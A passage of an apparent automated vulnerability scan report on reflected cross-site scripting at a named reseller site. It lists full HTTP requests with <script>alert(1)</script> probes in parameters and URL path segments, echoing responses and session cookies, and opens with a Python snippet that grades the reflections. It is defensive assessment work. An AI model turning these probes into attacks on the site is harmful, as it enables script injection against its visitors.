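    # A complete, unmodified <script>...</script> in text context runs on page load:
    # the report's "Certain". A lone tag proves markup injection only: "Firm".
    if context == "text" and re.search(r"<script>.*</script>", payload, re.S):
        return Reflection(context, "Certain")
    if re.search(r"<[A-Za-z][^>]*>", payload):
        return Reflection(context, "Firm")
    return Reflection(context, "Tentative")


if __name__ == "__main__":
    for label, body, payload in [
        ("2.1131", BODY_2_1131, "71148<script>alert(1)</script>d51bf8b874f"),
        ("2.1132", BODY_2_1132, "85b04<a>0355537e803"),
    ]:
        r = check_reflection(body, payload)
        print("%s: context=%s confidence=%s" % (label, r.context, r.confidence))
```

Run against the fragments, 2.1131 classifies as text/Certain and 2.1132 as text/Firm, matching the report. The Firm result says nothing about why the scanner's script probe failed for the Submit3, keyword and opt values; as the report says, that still needs manual examination.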

2.1133. http://www.resellerbase.com/detail/14/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ccfcc<a>623ab8a52f1 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/search.php?keyword=search...ccfcc<a>623ab8a52f1&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/search.php?keyword=search...ccfcc<a>623ab8a52f1&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1134. http://www.resellerbase.com/detail/14/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c9812<script>alert(1)</script>f726689fba1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/search.php?keyword=search...&Submit3=Search&opt=2&c9812<script>alert(1)</script>f726689fba1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/search.php?keyword=search...&Submit3=Search&opt=2&c9812<script>alert(1)</script>f726689fba1=1 was not found on this server.</p>
...[SNIP]...

2.1135. http://www.resellerbase.com/detail/14/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 26287<a>8242ec36020 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/search.php?keyword=search...&Submit3=Search&opt=226287<a>8242ec36020 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/search.php?keyword=search...&Submit3=Search&opt=226287<a>8242ec36020 was not found on this server.</p>
...[SNIP]...

2.1136. http://www.resellerbase.com/detail/14/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c947c<script>alert(1)</script>2116aedca07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc947c<script>alert(1)</script>2116aedca07/14/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc947c<script>alert(1)</script>2116aedca07/14/themes/ was not found on this server.</p>
...[SNIP]...

2.1137. http://www.resellerbase.com/detail/14/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7571<script>alert(1)</script>bff27da5d8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14d7571<script>alert(1)</script>bff27da5d8c/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14d7571<script>alert(1)</script>bff27da5d8c/themes/ was not found on this server.</p>
...[SNIP]...

2.1138. http://www.resellerbase.com/detail/14/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f769c<script>alert(1)</script>59ed39f3266 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themesf769c<script>alert(1)</script>59ed39f3266/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themesf769c<script>alert(1)</script>59ed39f3266/ was not found on this server.</p>
...[SNIP]...

2.1139. http://www.resellerbase.com/detail/14/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8f32e<script>alert(1)</script>4a9ae7d5019 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/?8f32e<script>alert(1)</script>4a9ae7d5019=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/?8f32e<script>alert(1)</script>4a9ae7d5019=1 was not found on this server.</p>
...[SNIP]...

2.1140. http://www.resellerbase.com/detail/14/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b94f5<script>alert(1)</script>6c3eeed11a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb94f5<script>alert(1)</script>6c3eeed11a7/14/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb94f5<script>alert(1)</script>6c3eeed11a7/14/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1141. http://www.resellerbase.com/detail/14/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b5da5<script>alert(1)</script>221e90d01ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14b5da5<script>alert(1)</script>221e90d01ae/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14b5da5<script>alert(1)</script>221e90d01ae/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1142. http://www.resellerbase.com/detail/14/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8642f<script>alert(1)</script>3b003d81e5c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes8642f<script>alert(1)</script>3b003d81e5c/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes8642f<script>alert(1)</script>3b003d81e5c/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1143. http://www.resellerbase.com/detail/14/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd12c<script>alert(1)</script>b5a7bd20753 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmoscd12c<script>alert(1)</script>b5a7bd20753/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmoscd12c<script>alert(1)</script>b5a7bd20753/ was not found on this server.</p>
...[SNIP]...

2.1144. http://www.resellerbase.com/detail/14/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fe4a2<script>alert(1)</script>7b9f45e14f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/?fe4a2<script>alert(1)</script>7b9f45e14f3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/?fe4a2<script>alert(1)</script>7b9f45e14f3=1 was not found on this server.</p>
...[SNIP]...

2.1145. http://www.resellerbase.com/detail/14/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload decc5<script>alert(1)</script>1913fe75109 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildecc5<script>alert(1)</script>1913fe75109/14/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildecc5<script>alert(1)</script>1913fe75109/14/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1146. http://www.resellerbase.com/detail/14/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7db8<script>alert(1)</script>83376a0740b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14c7db8<script>alert(1)</script>83376a0740b/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14c7db8<script>alert(1)</script>83376a0740b/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1147. http://www.resellerbase.com/detail/14/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb2e5<script>alert(1)</script>09f64ad2d47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themesbb2e5<script>alert(1)</script>09f64ad2d47/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themesbb2e5<script>alert(1)</script>09f64ad2d47/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1148. http://www.resellerbase.com/detail/14/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dee6f<script>alert(1)</script>54166cc5945 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmosdee6f<script>alert(1)</script>54166cc5945/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmosdee6f<script>alert(1)</script>54166cc5945/images/ was not found on this server.</p>
...[SNIP]...

2.1149. http://www.resellerbase.com/detail/14/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8f586<script>alert(1)</script>3f0e7846c79 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images8f586<script>alert(1)</script>3f0e7846c79/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images8f586<script>alert(1)</script>3f0e7846c79/ was not found on this server.</p>
...[SNIP]...

2.1150. http://www.resellerbase.com/detail/14/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cab3a<script>alert(1)</script>fe1494c358 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/?cab3a<script>alert(1)</script>fe1494c358=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/?cab3a<script>alert(1)</script>fe1494c358=1 was not found on this server.</p>
...[SNIP]...

2.1151. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b394<script>alert(1)</script>eccf831601d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2b394<script>alert(1)</script>eccf831601d/14/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2b394<script>alert(1)</script>eccf831601d/14/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1152. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2a8d6<script>alert(1)</script>22e40c8b6b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/142a8d6<script>alert(1)</script>22e40c8b6b4/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
